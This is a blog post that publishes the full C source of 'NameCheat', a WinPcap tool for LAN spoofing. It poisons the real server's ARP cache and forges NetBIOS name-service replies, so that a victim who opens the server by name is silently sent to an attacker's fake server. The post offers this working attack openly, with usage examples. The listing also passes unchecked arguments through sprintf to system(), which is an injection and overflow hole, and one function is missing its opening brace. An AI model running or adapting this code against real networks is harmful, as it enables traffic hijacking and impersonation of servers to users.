
且行且记录

点滴记录,行的更远!

 
 
 

日志

 
 

一个计算机名字欺骗程序  

2014-04-21 16:03:56|  分类: 一些练习 |  标签: |举报 |字号 订阅


在目标未开机及开机的情况下,客户用计算机名访问目标的话,会被骗到假服务器那。

缺点就是,停止欺骗的话,客户要等个10分钟的样子才能连真服务器。

这个可能要研究137名称服务如何发主动注销计算机名字的方法了。

这个原理就是用ARP单播请求欺骗真服务器,客户ip对应黑客机的mac。

这样真服务器的数据就发到黑客机,然后修改再转发。。。

客户机这时用ip也不能和真服务器通讯了,直到恢复欺骗才可以用ip访问。

用名字访问的话,大约要等10分钟。

// NameCheat.cpp

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <pcap.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "wpcap.lib")

#include "proto.h"
#include "chksum.h"

// IP/MAC table for the four hosts the tool reasons about. IPs are IPv4 in
// network byte order as returned by inet_addr() (see GetAllIPMac); MACs are
// raw 6-byte values (see MacStr2Bin). Uppercase = IP, lowercase = MAC.
typedef struct _IPMAC
{
 DWORD A; // victim's IP
 unsigned char a[6]; // victim's MAC

 DWORD B; // real server's IP
 unsigned char b[6]; // real server's MAC

 DWORD F; // fake server's IP
 unsigned char f[6]; // fake server's MAC

 DWORD H; // attacker host's IP (this machine)
 unsigned char h[6]; // attacker host's MAC

} IPMAC, *PIPMAC;

// One ARP-cache poisoning job, as consumed by CheatThread(): the host whose
// cache is targeted (Dest*), the IP whose mapping is overwritten there (ArpIp),
// and the wrong/right MAC for that IP. ResetSpoof() copies ArpMacTrue over
// ArpMacFalse to undo the poisoning.
typedef struct _DESTARP
{
 DWORD DestIp; // IP of the host whose ARP cache is targeted
 unsigned char DestMac[6]; // its MAC; CheatThread unicasts the ARP frame to it

 DWORD ArpIp; // IP whose mapping is being spoofed
 unsigned char ArpMacFalse[6]; // MAC advertised for ArpIp while spoofing (the wrong one)
 unsigned char ArpMacTrue[6];  // the genuine MAC for ArpIp, used to restore the cache
} DESTARP, *PDESTARP;

IPMAC t; // the IP/MAC table, filled once from argv by GetAllIPMac()
DESTARP tA,tB,tF; // only tB is used by the live code (CheatArpCache/ResetSpoof); tA/tF appear only in commented-out debug dumps

HANDLE hThread; // the CheatThread worker; terminated and re-created by ResetSpoof()

pcap_t *adhandle; // the opened capture handle, shared by every routine

int count=0; // number of port-137 name-query broadcasts from A seen so far (ForwardPacket)
u_long if_addr; // IPv4 address of the chosen interface, set as a side effect of ifprint()

unsigned char broadcast[6]={0xff,0xff,0xff,0xff,0xff,0xff}; // Ethernet broadcast MAC

// Canned NetBIOS Name Service frames captured from a lab run: 14-byte Ethernet
// header, 20-byte IPv4 header (first IP byte 0x45 -> IHL 5), 8-byte UDP header
// (ports 0x0089 = 137 both ways), then the NBNS payload. Lab addresses are
// 192.168.126.x (C0 A8 7E xx).
// NB_Query (92 bytes = 14 + IP total length 0x004E): a name query broadcast.
// Not referenced anywhere in the visible code.
unsigned char NB_Query[]={
0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x00, 0x0C, 0x29, 0x95, 0x05, 0x28, 0x08, 0x00, 0x45, 0x00,
0x00, 0x4E, 0x00, 0x44, 0x00, 0x00, 0x80, 0x11, 0xBC, 0x08, 0xC0, 0xA8, 0x7E, 0x02, 0xC0, 0xA8,
0x7E, 0xFF, 0x00, 0x89, 0x00, 0x89, 0x00, 0x3A, 0xBC, 0x6C, 0x80, 0x37, 0x01, 0x10, 0x00, 0x01,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x20, 0x46, 0x49, 0x46, 0x41, 0x46, 0x44, 0x46, 0x41, 0x44,
0x44, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43,
0x41, 0x43, 0x41, 0x43, 0x41, 0x41, 0x41, 0x00, 0x00, 0x20, 0x00, 0x01
};

// NB_Response (104 bytes = 14 + IP total length 0x005A): a name query
// response. ForwardPacket() patches it in place (Ethernet MACs, IP
// source/destination, TransID, Name, the answer's AddressIP and both
// checksums) and then sends the whole array.
unsigned char NB_Response[]={
0x00, 0x0C, 0x29, 0x95, 0x05, 0x28, 0x00, 0x50, 0x56, 0xC0, 0x00, 0x01, 0x08, 0x00, 0x45, 0x00,
0x00, 0x5A, 0x00, 0x31, 0x00, 0x00, 0x40, 0x11, 0xFD, 0x0D, 0xC0, 0xA8, 0x7E, 0x01, 0xC0, 0xA8,
0x7E, 0x02, 0x00, 0x89, 0x00, 0x89, 0x00, 0x46, 0x66, 0xCD, 0x80, 0x37, 0x85, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x20, 0x46, 0x49, 0x46, 0x41, 0x46, 0x44, 0x46, 0x41, 0x44,
0x44, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43,
0x41, 0x43, 0x41, 0x43, 0x41, 0x41, 0x41, 0x00, 0x00, 0x20, 0x00, 0x01, 0x00, 0x04, 0x93, 0xE0,
0x00, 0x06, 0x00, 0x00, 0xC0, 0xA8, 0x7E, 0x01
};

/*
void dumpbin(unsigned char *s,int n) //输出二进制内容
{
 int i;

 printf("===Begin Dump===");

 for (i=0;i<n;i++ )
 {
  if (i%16 == 0 )
  {
   printf("\n%04x: ",i);
  }
  printf("%02X ",*(s+i));
 }

 printf("\n");
 printf("===End Dump===\n");

}
*/

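//
// Convert a textual MAC address ("11-22-33-44-55-66": six two-digit hex
// octets with one separator character between them, 17 characters in all)
// into its 6 raw bytes.
//
// macstr: NUL-terminated input (may be NULL).
// buff:   receives the 6 bytes; left untouched if parsing fails.
// Returns TRUE on success, FALSE (after printing a diagnostic) when the string
// is NULL, is not 17 characters long, or any octet is not two hex digits.
//
BOOL MacStr2Bin(char *macstr,unsigned char *buff)
{
 unsigned char tmp[6];

 if (macstr == NULL)
 {
  printf("[-] Error MAC string is NULL\n");
  return FALSE;
 }

 if (strlen(macstr)!=17)
 {
  printf("[-] Error %s len!=17\n",macstr);
  return FALSE;
 }

 for (int i=0;i<6 ;i++ )
 {
  // Octet i starts at offset 3*i; offsets 2, 5, ..., 14 hold the separators.
  const char *octet = macstr + 3*i;
  char pair[3];

  // strtoul on its own would also accept leading whitespace or a sign,
  // so insist on exactly two hex digits before converting.
  if (!isxdigit((unsigned char)octet[0]) || !isxdigit((unsigned char)octet[1]))
  {
   printf("[-] Error %s octet %d is not two hex digits\n",macstr,i);
   return FALSE;
  }

  pair[0] = octet[0];
  pair[1] = octet[1];
  pair[2] = '\0';
  tmp[i] = (unsigned char) strtoul(pair, NULL, 16);
 }

 // The previous version stored each octet with sscanf("%02x") through a
 // char pointer, i.e. an unsigned int write into a char slot — undefined
 // behaviour that only happened to produce the right bytes on little-endian
 // hosts. Parsing into tmp first also keeps buff untouched on failure.
 memcpy(buff, tmp, 6 );
 return TRUE;
}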


// argv layout: 0 1 2 3 4 5 6 7 8
//                A a B b F f H h
// Fill the global IP/MAC table t from the command line: odd positions hold
// dotted-decimal IPv4 strings (parsed with inet_addr, network byte order),
// even positions the matching MAC strings (parsed with MacStr2Bin, whose
// return value is not checked here, so a bad MAC leaves that slot as-is).
void GetAllIPMac(char *v[])
{
 DWORD *ip_slot[4] = { &t.A, &t.B, &t.F, &t.H };
 unsigned char *mac_slot[4] = { t.a, t.b, t.f, t.h };

 for (int k = 0; k < 4; k++)
 {
  *ip_slot[k] = inet_addr( v[2*k + 1] );
  MacStr2Bin(v[2*k + 2], mac_slot[k]);
 }
}

// argv layout: 0 1 2 3 4 5 6 7 8
//                A a B b F f H h
// Pin the four IP/MAC pairs as static entries in this host's own ARP table by
// shelling out to "arp -s <IP> <MAC> <interface IP>", the interface IP being
// the global if_addr that ifprint() filled in.
// NOTE(review): cmd is 256 bytes but sprintf copies v[i] and v[i+1] unbounded,
// so an over-long argument overflows this stack buffer; the result then goes to
// system(), i.e. through the shell. Only the MAC strings are ever
// length-checked (by MacStr2Bin, whose result GetAllIPMac ignores); the IP
// strings are never validated.
void SetStatic(char *v[])
{
 char cmd[256];

 for (int i=1; i<9; i+=2)
 {
  // arp -s 1.1.1.1 11-22-33-44-55-66 1.1.1.1
  unsigned char *p;
  p = (unsigned char *) &if_addr; // dotted-decimal form of the interface address, byte by byte
  sprintf(cmd,"arp -s %s %s %d.%d.%d.%d\n", v[i], v[i+1], p[0],p[1],p[2],p[3]);
  //printf("%s\n",cmd);
  system(cmd);
 }
}

//
// Spoofing worker thread: builds one ARP request frame and re-sends it every
// 3 seconds until the thread is terminated from outside (ResetSpoof).
// lparam: a PDESTARP describing the job. The frame is unicast to
// p->DestMac / p->DestIp and claims that p->ArpIp is at p->ArpMacFalse, which
// is what the receiving host caches — the "unicast ARP request" poisoning the
// author describes above. From a monitoring point of view the artefact is a
// unicast ARP request for the same pair repeating every 3 s.
// Returns FALSE if pcap_sendpacket fails; the trailing TRUE is unreachable.
// NOTE(review): the opening '{' of the function body is missing from the
// listing as published.
// NOTE(review): the frame is assembled as sizeof(ETHeader)+sizeof(ARPHeader)
// bytes but sent as ARP_LEN bytes (from proto.h, not shown) — presumably the
// same value; confirm.
// NOTE(review): CheatArpCache/ResetSpoof start this through a cast to
// LPTHREAD_START_ROUTINE, whose expected shape is DWORD WINAPI fn(LPVOID);
// this function is UINT with the default calling convention, and the cast
// hides the mismatch.
//
UINT CheatThread(LPVOID lparam)

 PDESTARP p = (PDESTARP)lparam;
 u_char ucFrame[ARP_LEN];

 // Ethernet header: to the target host, from this machine
 ETHeader eh = { 0 };
 memcpy(eh.dhost, p->DestMac, 6);
 memcpy(eh.shost, t.h, 6);
 eh.type = htons(ETHERTYPE_ARP);
 memcpy(ucFrame, &eh, sizeof(eh));

 // ARP header: Ethernet/IPv4 request
 ARPHeader ah = { 0 };
 ah.hrd = htons(ARPHRD_ETHER);
 ah.eth_type = htons(ETHERTYPE_IP);
 ah.maclen = 6;
 ah.iplen = 4;
 ah.opcode = htons(ARP_REQUEST);

 memcpy(ah.smac, p->ArpMacFalse, 6); // sender MAC: the wrong mapping being planted
 ah.saddr = p->ArpIp; // sender IP: the IP whose mapping is spoofed
 memset(ah.dmac, 0x00, 6);
 ah.daddr = p->DestIp;

 memcpy(&ucFrame[sizeof(ETHeader)], &ah, sizeof(ah));

 while(1)
 {
  if(pcap_sendpacket(adhandle, (const unsigned char *) ucFrame,
   ARP_LEN) < 0)
  {
   printf("[-] Send Packet Error\n");
   return FALSE;
  }

  Sleep(3000); // re-send every 3 s so the cache entry does not expire back to the real MAC
 }
 return TRUE; 
}

// Poison B's (the real server's) ARP cache so that B resolves A's IP to this
// machine's MAC (t.h), which is how B->A traffic ends up in ForwardPacket().
// The genuine MAC (t.a) is kept in ArpMacTrue so ResetSpoof() can restore it.
// Starts CheatThread on &tB and keeps the handle in the global hThread.
// NOTE(review): CreateThread's dwStackSize and dwCreationFlags parameters are
// integers, yet NULL is passed for them; the function-pointer cast is
// discussed at CheatThread.
void CheatArpCache()
{
 tB.DestIp = t.B;
 memcpy(tB.DestMac, t.b, 6);
 tB.ArpIp = t.A;
 memcpy(tB.ArpMacFalse, t.h, 6);
 memcpy(tB.ArpMacTrue, t.a, 6);
 hThread = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)CheatThread, (LPVOID) &tB, NULL, NULL);
}

//
// Rewrite-and-forward routine — the core of the program.
// Called for every captured frame. Only IPv4/UDP is looked at, and within that
// two cases, both keyed on UDP port 137 (NetBIOS Name Service):
//   1. a frame from B (real server) addressed to A (victim) that reached this
//      host because B's ARP cache now maps A to our MAC: the NBNS answer is
//      rewritten so it appears to come from F (fake server) and re-injected
//      toward A;
//   2. a broadcast NBNS query from A: from the second one onward the canned
//      NB_Response template is filled in and sent to A as if from F.
// Everything else is dropped (the else branch is empty).
// Observable inconsistency in what goes out: the Ethernet source is this
// machine's MAC (t.h) while the IP source claims F — a monitor that correlates
// ARP/IP bindings would see it.
//
// adhandle: capture handle used for pcap_sendpacket (shadows the global of the same name).
// pkt_data: the captured frame; modified in place in case 1.
// pkt_len:  length supplied by the caller (header->len in packet_handler).
//
// NOTE(review): header pointers are cast straight from pkt_data without
// checking pkt_len against 14 + ip_len + sizeof(UDPHeader) + sizeof(NBHeader);
// a short or truncated capture is read out of bounds.
// NOTE(review): th, szSource, szDest, sport and dport are never used.
// NOTE(review): the IP checksum and the UDP payload offset use
// sizeof(IPHeader) rather than ip_len, so IP options (IHL > 5) would be
// mishandled; cannot confirm IPHeader's size from here (proto.h not shown).
//
void ForwardPacket(pcap_t *adhandle, const u_char *pkt_data, unsigned int pkt_len)
{
 ETHeader *eh;
    IPHeader *ih;
    TCPHeader *th;
    UDPHeader *uh;
    u_int ip_len;
 char szSource[16],szDest[16];
    u_short sport, dport;

 eh = (ETHeader *) pkt_data;

 if(eh->type != htons(ETHERTYPE_IP)) return; // only IPv4 frames are handled

 ih = (IPHeader *) (pkt_data + 14); // IP header follows the 14-byte Ethernet header
 ip_len = (ih->iphVerLen & 0x0f) * 4; // IHL in 32-bit words -> bytes

 if (ih->ipProtocol == PROTO_UDP) // UDP only
 {
  uh = (UDPHeader *) ((u_char*)ih + ip_len); // UDP header right after the IP header

  //
  // Case 1: B -> A direction. Destination IP is A's, but the frame was
  // delivered to our MAC, i.e. B's poisoned ARP entry sent it here.
  if (ih->ipDestination==t.A && memcmp(eh->dhost, t.h, 6) == 0)
  {
   // Notation: IPsrc->IPdst/MACsrc->MACdst.  B->A/b->h => F->A/h->a
   // Port 137 is compared as a raw u_short: 0x0089 in network order reads
   // as 0x8900 on this little-endian host.
   if (memcmp(eh->shost, t.b, 6) == 0 && uh->sourcePort == 0x8900 && uh->destinationPort == 0x8900)
   {
    NBHeader *nh;

    nh = (NBHeader *) ((u_char *)uh + sizeof(UDPHeader));

    // rewrite B's port-137 response and forward it to A
    printf("[UDP] B->A/b->h => F->A/h->a\n");
    memcpy(eh->shost, t.h, 6);
    memcpy(eh->dhost, t.a, 6);

    ih->ipSource = t.F;

    nh->AddressIP = t.F; // the answer now points at the fake server

    // UDP payload pointer/length, derived from the IP total length
    unsigned char *dataudp = (unsigned char *) ih + sizeof(IPHeader)
     + sizeof(UDPHeader);
    int lenudp = ntohs(ih->ipLength) - (sizeof(IPHeader) + sizeof(UDPHeader));

    // recompute both checksums over the modified headers/payload
    ih->ipChecksum = 0;
    uh->checksum = 0;
    ih->ipChecksum = checksum((USHORT *)ih, sizeof(IPHeader));
    CalcUdpCheckSum(ih, uh, (char *)dataudp, lenudp);

    if (pcap_sendpacket(adhandle, (const unsigned char *) pkt_data, pkt_len) < 0)
    {
     printf("[-] Forward thread send packet error\n");
    }
   }

  }

  // Case 2: port-137 name-query broadcast from A. When B is down, A repeats
  // the query 3 times (author's observation).
  if (memcmp(eh->shost, t.a, 6) == 0 && memcmp(eh->dhost, broadcast, 6) == 0)
  {
   NBHeader *nh;
   nh = (NBHeader *) ((u_char *)uh + sizeof(UDPHeader));

   // 137 = 0x0089 -> 0x8900 as a raw little-endian u_short; Flags bytes
   // 01 10 (cf. NB_Query) likewise read as 0x1001
   if ( uh->sourcePort == 0x8900 && uh->destinationPort == 0x8900 && nh->Flags==0x1001) // 137=0x0089
   {
    count++;
    if (count > 1) // answer from the second query onward, then reset the counter
    {
     ETHeader *eh1;
     IPHeader *ih1;
     UDPHeader *uh1;
     NBHeader *nh1;
     //NBHeader Response;

     // overlay the header structs on the NB_Response template
     eh1 = (ETHeader *) NB_Response;
     ih1 = (IPHeader *) (NB_Response+14);
     // NOTE(review): ip_len is the IHL of the *captured* query, not of
     // NB_Response (whose own IHL is 5 -> 20 bytes); correct only when they match
     uh1 = (UDPHeader *) ((u_char*)ih1 + ip_len);;
     nh1 = (NBHeader *) ((u_char *)uh1 + sizeof(UDPHeader));

     // patch the Ethernet header
     printf("[UDP] A->*/a->* => F->A/h->a\n");
     memcpy(eh1->shost, t.h, 6);
     memcpy(eh1->dhost, t.a, 6);

     ih1->ipSource = t.F;  // fake server
     ih1->ipDestination = t.A;

     nh1->TransID = nh->TransID; // echo the query's transaction id
     memcpy(nh1->Name, nh->Name, 0x22); // the name A asked for (0x22 = 34 bytes: length byte, 32 encoded chars, terminator)
     nh1->AddressIP = t.F;  // fake server

     unsigned char *dataudp = (unsigned char *) ih1 + sizeof(IPHeader)
      + sizeof(UDPHeader);
     int lenudp = ntohs(ih1->ipLength) - (sizeof(IPHeader) + sizeof(UDPHeader));

     ih1->ipChecksum = 0;
     uh1->checksum = 0;
     ih1->ipChecksum = checksum((USHORT *)ih1, sizeof(IPHeader));
     CalcUdpCheckSum(ih1, uh1, (char *)dataudp, lenudp);

     count=0;

     if (pcap_sendpacket(adhandle, (const unsigned char *) NB_Response, sizeof(NB_Response)) < 0)
     {
      printf("[-] Forward thread send packet error\n");
     }

    }
   }
  }
 }
 else // other protocols (ICMP, ...): intentionally nothing
 {
 }
}

//
// pcap_loop callback: hands every captured frame to ForwardPacket(), using the
// global capture handle for re-injection. param is unused. header->len is the
// on-wire length; pcap also reports caplen, the number of bytes actually in
// the buffer — the two differ only if the frame was truncated.
//
void packet_handler(u_char *param, const struct pcap_pkthdr *header, const u_char *pkt_data)
{
 (void)param;
 const unsigned int frame_len = header->len;
 ForwardPacket(adhandle, pkt_data, frame_len);
}

//
// Undo the ARP spoofing and restore the poisoned host's ARP cache, then stop
// the capture loop. Called from CtrlHandler on console shutdown events.
// Steps: kill the spoofing thread, re-run CheatThread for ~3.6 s with the
// genuine MAC (ArpMacTrue copied over ArpMacFalse) so B re-learns the real
// mapping, kill that thread too, flush this host's own ARP cache ("arp -d")
// and break out of pcap_loop.
// NOTE(review): TerminateThread stops the thread at an arbitrary point; the
// message says "Sleep 5s" but the loop below waits 12 x 300 ms = 3.6 s.
//
void ResetSpoof()
{
 printf("[*] Reseting .....\n");

 TerminateThread(hThread, 0);

 // advertise the real MAC for a while so the target's cache is corrected
 memcpy(tB.ArpMacFalse, tB.ArpMacTrue, 6);
 hThread = CreateThread(NULL, NULL, (LPTHREAD_START_ROUTINE)CheatThread, (LPVOID) &tB, NULL, NULL);

 printf("[*] Sleep 5s ");
 for(int i = 0; i < 12; i++, Sleep(300))
   printf(".");
 printf("\n");
 TerminateThread(hThread, 0);
 
 system("arp -d\n"); // drop the static entries SetStatic() added locally

 // Author's note: after pcap_breakloop every further operation on the adapter
 // aborts the program — do not touch adhandle after this point.
 pcap_breakloop(adhandle);
}


//
// Console control handler (installed with SetConsoleCtrlHandler). On any of
// the five terminating console events it undoes the ARP spoofing via
// ResetSpoof() and reports the event as handled (TRUE); any other event is
// left to the next handler (FALSE).
//
BOOL CtrlHandler( DWORD fdwCtrlType )
{
 const BOOL terminating = (fdwCtrlType == CTRL_C_EVENT
  || fdwCtrlType == CTRL_CLOSE_EVENT
  || fdwCtrlType == CTRL_BREAK_EVENT
  || fdwCtrlType == CTRL_LOGOFF_EVENT
  || fdwCtrlType == CTRL_SHUTDOWN_EVENT);

 if (!terminating)
  return FALSE;

 ResetSpoof(); // put the poisoned ARP entry back before the process goes away
 return TRUE;
}

/* From tcptraceroute, convert a numeric IP address to a string */
#define IPTOSBUFFERS 12
/*
 * Format the IPv4 address `in` (network byte order, first four bytes used)
 * as dotted decimal. The result lives in one of IPTOSBUFFERS static buffers
 * used round-robin, so up to 12 results from consecutive calls stay valid at
 * once (e.g. several iptos() arguments in one printf). Not thread-safe.
 */
char *iptos(u_long in)
{
 static char output[IPTOSBUFFERS][3*4+3+1];
 static short which;
 unsigned char octet[4];

 memcpy(octet, &in, sizeof octet);
 which = (short)((which + 1) % IPTOSBUFFERS); // advance to the next slot, wrapping
 snprintf(output[which], sizeof output[which], "%u.%u.%u.%u",
  octet[0], octet[1], octet[2], octet[3]);
 return output[which];
}

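//
// Print one pcap interface: name, description, loopback flag and, for each
// address entry, its family and (for AF_INET) address, netmask, broadcast and
// destination addresses.
// Side effect: the address of every AF_INET entry is stored in the global
// if_addr, so after the call if_addr holds the last IPv4 address listed;
// SetStatic() uses it as the interface argument of "arp -s".
// Entries whose addr pointer is NULL are skipped (the previous version read
// a->addr->sa_family before checking a->addr).
//
void ifprint(pcap_if_t *d)
{
  pcap_addr_t *a;

  /* Name */
  printf("%s\n",d->name);

  /* Description */
  if (d->description)
    printf("\tDescription: %s\n",d->description);

  /* Loopback Address*/
  printf("\tLoopback: %s\n",(d->flags & PCAP_IF_LOOPBACK)?"yes":"no");

  /* IP addresses */
  for(a=d->addresses;a;a=a->next) {
    if (!a->addr)
      continue; /* nothing printable without a sockaddr */

    printf("\tAddress Family: #%d\n",a->addr->sa_family);

    switch(a->addr->sa_family)
    {
      case AF_INET:
        printf("\tAddress Family Name: AF_INET\n");
        /* remember the interface's IPv4 address for SetStatic() */
        if_addr =((struct sockaddr_in *)a->addr)->sin_addr.s_addr;
        printf("\tAddress: %s\n", iptos(if_addr));
        if (a->netmask)
          printf("\tNetmask: %s\n",iptos(((struct sockaddr_in *)a->netmask)->sin_addr.s_addr));
        if (a->broadaddr)
          printf("\tBroadcast Address: %s\n",iptos(((struct sockaddr_in *)a->broadaddr)->sin_addr.s_addr));
        if (a->dstaddr)
          printf("\tDestination Address: %s\n",iptos(((struct sockaddr_in *)a->dstaddr)->sin_addr.s_addr));
        break;

      case AF_INET6:
        printf("\tAddress Family Name: AF_INET6\n");
        break;

      default:
        printf("\tAddress Family Name: Unknown\n");
        break;
    }
  }
  printf("\n");
}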


//
// Entry point. argv: <prog> A a B b F f H h (uppercase = IPv4, lowercase =
// MAC; see the usage text). Lists the WinPcap interfaces, asks for one, opens
// it in promiscuous mode, installs the console handler, fills the IP/MAC table,
// pins the static ARP entries, starts the spoofing thread and then runs
// pcap_loop until ResetSpoof() calls pcap_breakloop.
// NOTE(review): scanf's return value is not checked, so on non-numeric input
// inum is read uninitialised; d->description may be NULL at the "listening on"
// printf although the listing loop above guards against that; exit(1) after
// pcap_findalldevs skips the cleanup the other error paths perform.
//
int main(int argc, char *argv[])
{
 pcap_if_t *alldevs;
 pcap_if_t *d;
 int inum;
 int i=0;
 char errbuf[PCAP_ERRBUF_SIZE];

 printf("*** 名字欺骗 V1.0 ***\n");
 printf("*** 按下CTRL+C结束欺骗 ***\n");
 printf("*** hcper @ 2014.4.20修改 ***\n");

 // usage: exactly 8 arguments (4 IP/MAC pairs) are required
 if (argc != 9)
 {
  printf("帮助: %s A a B b F f H h\n", argv[0]);
  printf("说明: 黑客H欺骗A当他用名字访问B的时候实际上访问了F!\n");
  printf("大写字母表示IP,小写字母表示MAC\n\n");
  printf("例子: %s " \
    "192.168.10.1 11-11-11-11-11-11 " \
    "192.168.10.2 22-22-22-22-22-22 " \
    "192.168.10.3 33-33-33-33-33-33 " \
    "192.168.10.4 44-44-44-44-44-44\n", argv[0]);
  return 0;
 }
 
 /* Retrieve the device list */
 if(pcap_findalldevs(&alldevs, errbuf) == -1)
 {
  fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
  exit(1);
 }
 
 /* Print the list */
 for(d=alldevs; d; d=d->next)
 {
  printf("%d. %s\n", ++i, d->name);
  if (d->description)
   printf("\t(%s)\n\n", d->description);
  else
   printf("\t(No description available)\n\n");
 }
 
 if(i==0)
 {
  printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
  return -1;
 }
 
 printf("Enter the interface number (1-%d):",i);
 scanf("%d", &inum);
 
 if(inum < 1 || inum > i)
 {
  printf("\nInterface number out of range.\n");
  /* Free the device list */
  pcap_freealldevs(alldevs);
  return -1;
 }
 
 /* Jump to the selected adapter (empty loop body: it only advances d) */
 for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);


 /* Open the adapter */
 if ((adhandle= pcap_open_live(d->name, // name of the device
        65536,   // portion of the packet to capture.
           // 65536 grants that the whole packet will be captured on all the MACs.
        1,    // promiscuous mode (nonzero means promiscuous)
        1000,   // read timeout
        errbuf   // error buffer
        )) == NULL)
 {
  fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name);
  /* Free the device list */
  pcap_freealldevs(alldevs);
  return -1;
 }

 printf("\n接口信息:\n");
 ifprint(d); // also sets the global if_addr used by SetStatic()
 
 printf("\nlistening on %s...\n", d->description);

 // make CTRL+C / close / logoff run ResetSpoof() so the target's ARP cache is restored
 SetConsoleCtrlHandler((PHANDLER_ROUTINE) CtrlHandler, TRUE);

 GetAllIPMac(argv); // fill the IP/MAC table from argv

 SetStatic(argv); // pin the pairs in this host's own ARP table
 
 CheatArpCache(); // start poisoning B's ARP cache
/*
 printf("t:\n");
 dumpbin((unsigned char *)&t, sizeof(t) ); // debug

 printf("tA:\n");
 dumpbin((unsigned char *)&tA, sizeof(tA) ); // debug

 printf("tB:\n");
 dumpbin((unsigned char *)&tB, sizeof(tB) ); // debug

 printf("tF:\n");
 dumpbin((unsigned char *)&tF, sizeof(tF) ); // debug

 Sleep(2000);
*/
 /* At this point, we don't need any more the device list. Free it */
 pcap_freealldevs(alldevs);

 /* start the capture; returns once ResetSpoof() calls pcap_breakloop */
 pcap_loop(adhandle, 0, packet_handler, NULL);
 
 pcap_close(adhandle);

 return 0;
}
